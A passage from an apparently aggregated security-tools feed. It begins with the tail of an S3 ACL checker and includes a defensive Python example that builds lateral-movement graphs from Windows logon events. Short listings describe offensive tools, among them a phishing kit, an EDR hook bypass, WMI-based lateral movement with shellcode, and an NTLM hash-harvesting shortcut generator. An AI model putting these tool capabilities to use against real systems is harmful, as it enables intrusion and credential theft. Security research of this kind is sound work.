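                           "Permission": "WRITE"}]}

if __name__ == "__main__":
    for label, acl in [("private", PRIVATE), ("world-list", WORLD_LIST), ("world-write", WORLD_WRITE)]:
        print(label, public_access(acl), worst_public_operation(acl))
```

An ACL is only one of the inputs S3 evaluates: a bucket policy can grant more than the ACL shows, and S3 Block Public Access can deny what the ACL grants. That is why the live probing S3Sec and Slyther perform remains the ground truth; this check is for ranking what to probe first.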
Kitploit | added 2022/03/19 8:30 p.m. | 38 views

Nuclei-Burp-Plugin - Nuclei Plugin For BurpSuite

A BurpSuite plugin intended to help with nuclei template generation. Features: template matcher generation; word and binary matcher creation using selected response snippets from Proxy history or Repeater contexts; multi-line selections are split into separate words for readability; binary matchers are...

AI score: 7.4 | Exploits: 0 | References: 10

Kitploit | added 2022/03/19 11:30 a.m. | 69 views

Ghostbuster - Eliminate Dangling Elastic IPs By Performing Analysis On Your Resources Within All Your AWS Accounts

Eliminate dangling elastic IPs by performing analysis on your resources within all your AWS accounts. Ghostbuster obtains all the DNS records present in all of your AWS accounts Route53, and can optionally take in records via CSV input, or via Cloudflare. After these records are collected,...

AI score: 6.6 | Exploits: 0 | References: 4

Kitploit | added 2022/03/18 8:30 p.m. | 21 views

S1EM - This Project Is A SIEM With SIRP And Threat Intel, All In One

Today, cyber attacks are more numerous and cause damage in companies. Nevertheless, many software products exist to detect cyber threats. The S1EM solution is based on the principle of bringing together the best products in their field, free of charge, and making them quickly interoperable. S1EM ...

AI score: 7.4 | Exploits: 0 | References: 34

Kitploit | added 2022/03/18 11:30 a.m. | 177 views

Epagneul - Graph Visualization For Windows Event Logs

Epagneul is a tool to visualize and investigate Windows event logs. Deployment requires docker and docker-compose to be installed. Installing: make. Offline deployment: on a machine connected to the internet, build an offline release with make release. This will create a release folder containing ready-to-go...

AI score: 7.4 | Exploits: 0 | References: 6
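The graph Epagneul draws is built from logon events, and the part of that construction worth seeing in code is how raw 4624 records become directed, time-ordered edges between hosts. The following is an added example written for this page, not Epagneul's code: it keeps only remote logon types, drops machine and anonymous accounts, builds source-to-target edges, and then answers the two questions an investigator asks of such a graph: which hosts were both landed on and pivoted from, and what time-consistent chain leads out of a given starting point. The events are constructed, with field names in the shape a SIEM export of Security 4624 events commonly uses; the host names and addresses are invented.

```python
from collections import defaultdict
from datetime import datetime

# Logon types implying a remote source: 3 = network (SMB, WMI, PsExec-style),
# 10 = RemoteInteractive (RDP). Interactive (2) and service (5) logons are local.
REMOTE_LOGON_TYPES = {3, 10}

# Constructed 4624 events as a SIEM might export them (not a real capture).
SAMPLE_EVENTS = [
    {"TimeCreated": "2022-03-18T08:30:00", "EventID": 4624, "Computer": "WS01.corp.local",
     "TargetUserName": "admin", "LogonType": 3, "WorkstationName": "FS01", "IpAddress": "10.0.0.12"},
    {"TimeCreated": "2022-03-18T09:00:00", "EventID": 4624, "Computer": "WS01.corp.local",
     "TargetUserName": "alice", "LogonType": 10, "WorkstationName": "-", "IpAddress": "10.0.0.50"},
    {"TimeCreated": "2022-03-18T09:02:00", "EventID": 4624, "Computer": "WS01.corp.local",
     "TargetUserName": "bob", "LogonType": 2, "WorkstationName": "WS01", "IpAddress": "-"},
    {"TimeCreated": "2022-03-18T09:07:00", "EventID": 4624, "Computer": "FS01.corp.local",
     "TargetUserName": "alice", "LogonType": 3, "WorkstationName": "WS01", "IpAddress": "10.0.0.11"},
    {"TimeCreated": "2022-03-18T09:08:00", "EventID": 4624, "Computer": "DC01.corp.local",
     "TargetUserName": "WS01$", "LogonType": 3, "WorkstationName": "WS01", "IpAddress": "10.0.0.11"},
    {"TimeCreated": "2022-03-18T09:15:00", "EventID": 4624, "Computer": "DC01.corp.local",
     "TargetUserName": "svc_backup", "LogonType": 3, "WorkstationName": "FS01", "IpAddress": "10.0.0.12"},
]


def source_of(event):
    """Prefer the workstation name the client announced; fall back to the IP address."""
    ws = event.get("WorkstationName", "-")
    return ws.upper() if ws not in ("", "-") else event.get("IpAddress", "-")


def build_edges(events):
    """Directed, time-stamped edges (time, source, target, user, logon type) for remote logons."""
    edges = []
    for ev in events:
        if ev.get("EventID") != 4624 or int(ev.get("LogonType", 0)) not in REMOTE_LOGON_TYPES:
            continue
        user = ev["TargetUserName"]
        if user.endswith("$") or user.upper() == "ANONYMOUS LOGON":
            continue                       # machine and anonymous accounts: noise for this view
        src, dst = source_of(ev), ev["Computer"].split(".")[0].upper()
        if src in ("-", "127.0.0.1", "::1") or src == dst:
            continue
        edges.append((datetime.fromisoformat(ev["TimeCreated"]), src, dst, user, int(ev["LogonType"])))
    return sorted(edges)


def pivots(edges):
    """Hosts that both received a remote logon and originated one: candidate lateral-movement hops."""
    targets = {dst for _, _, dst, _, _ in edges}
    sources = {src for _, src, _, _, _ in edges}
    return targets & sources


def chains(edges, start, max_hops=8):
    """Maximal logon chains from `start` in which every hop happens after the previous one."""
    out = defaultdict(list)
    for t, src, dst, user, _ in edges:
        out[src].append((t, dst, user))
    results = []

    def walk(node, path, after):
        extended = False
        for t, dst, _ in out.get(node, []):
            if t <= after or dst in path or len(path) > max_hops:
                continue
            extended = True
            walk(dst, path + [dst], t)
        if not extended and len(path) > 1:
            results.append(path)

    walk(start, [start], datetime.min)
    return results


if __name__ == "__main__":
    edges = build_edges(SAMPLE_EVENTS)
    for t, src, dst, user, lt in edges:
        print(f"{t:%H:%M} {src:>12} -> {dst:<6} {user:<12} type {lt}")
    print("pivots:", sorted(pivots(edges)))
    print("chains from 10.0.0.50:", chains(edges, "10.0.0.50"))
```

The time ordering matters: without it the 08:30 admin logon from FS01 to WS01 would close a cycle and make every host look like a pivot. With it, the only chain out of the external address is 10.0.0.50 to WS01 to FS01 to DC01, which is the path an analyst would want drawn first.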
Kitploit | added 2022/03/17 8:30 p.m. | 441 views

Mip22 - An Advanced Phishing Tool

The program is made for educational purposes only, to see how the phishing method works. Any unnecessary use of the program is prohibited and the manufacturer has no responsibility for any illegal use by anyone. Use the tool at your own risk and avoid any sloppy actions. Installation...

AI score: 7.2 | Exploits: 0 | References: 4

Kitploit | added 2022/03/17 11:30 a.m. | 30 views

PurplePanda - Identify Privilege Escalation Paths Within And Across Different Clouds

This tool fetches resources from different cloud/SaaS applications, focusing on permissions, in order to identify privilege escalation paths and dangerous permissions in the cloud/SaaS configurations. Note that PurplePanda searches for privilege escalation paths both within a platform and across...

AI score: 7.3 | Exploits: 0 | References: 4

Kitploit | added 2022/03/16 8:30 p.m. | 25 views

RefleXXion - A Utility Designed To Aid In Bypassing User-Mode Hooks Utilised By AV/EPP/EDR Etc

Introduction RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks, it first collects the syscall numbers of the NtOpenFile, NtCreateSection, NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature arra...

AI score: 7.3 | Exploits: 0 | References: 3

Kitploit | added 2022/03/16 11:30 a.m. | 23 views

WMEye - A Post Exploitation Tool That Uses WMI Event Filter And MSBuild Execution For Lateral Movement

WMEye is an experimental tool that was developed while exploring Windows WMI. The tool is developed for performing lateral movement using WMI and remote MSBuild execution. It uploads the encoded/encrypted shellcode into a remote target's WMI class property, creates an event filter that when...

AI score: 7.5 | Exploits: 0 | References: 1

Kitploit | added 2022/03/16 5:29 a.m. | 43 views

Patching - An Interactive Binary Patching Plugin For IDA Pro

Patching assembly code to change the behavior of an existing program is not uncommon in malware analysis, software reverse engineering, and broader domains of security research. This project extends the popular IDA Pro disassembler to create a more robust interactive binary patching workflow...

AI score: 7.3 | Exploits: 0 | References: 11

Kitploit | added 2022/03/14 8:30 p.m. | 28 views

Lnkbomb - Malicious Shortcut Generator For Collecting NTLM Hashes From Insecure File Shares

Lnkbomb is used for uploading malicious shortcut files to insecure file shares. The vulnerability exists due to Windows looking for an icon file to associate with the shortcut file. This icon file can be directed to a penetration tester's machine running Responder or smbserver to gather NTLMv1 or...

AI score: 7.5 | Exploits: 0 | References: 2

Kitploit | added 2022/03/14 11:30 a.m. | 26 views

CodeAnalysis - Static Code Analysis

Tencent Cloud Code Analysis (TCA for short, code-named CodeDog inside the company early on) is a comprehensive platform for code analysis and issue tracking. TCA consists of three components: server, web and client. It also supports the integration of other code analysis tools. Code analysis is a...

AI score: 8.1 | Exploits: 0 | References: 14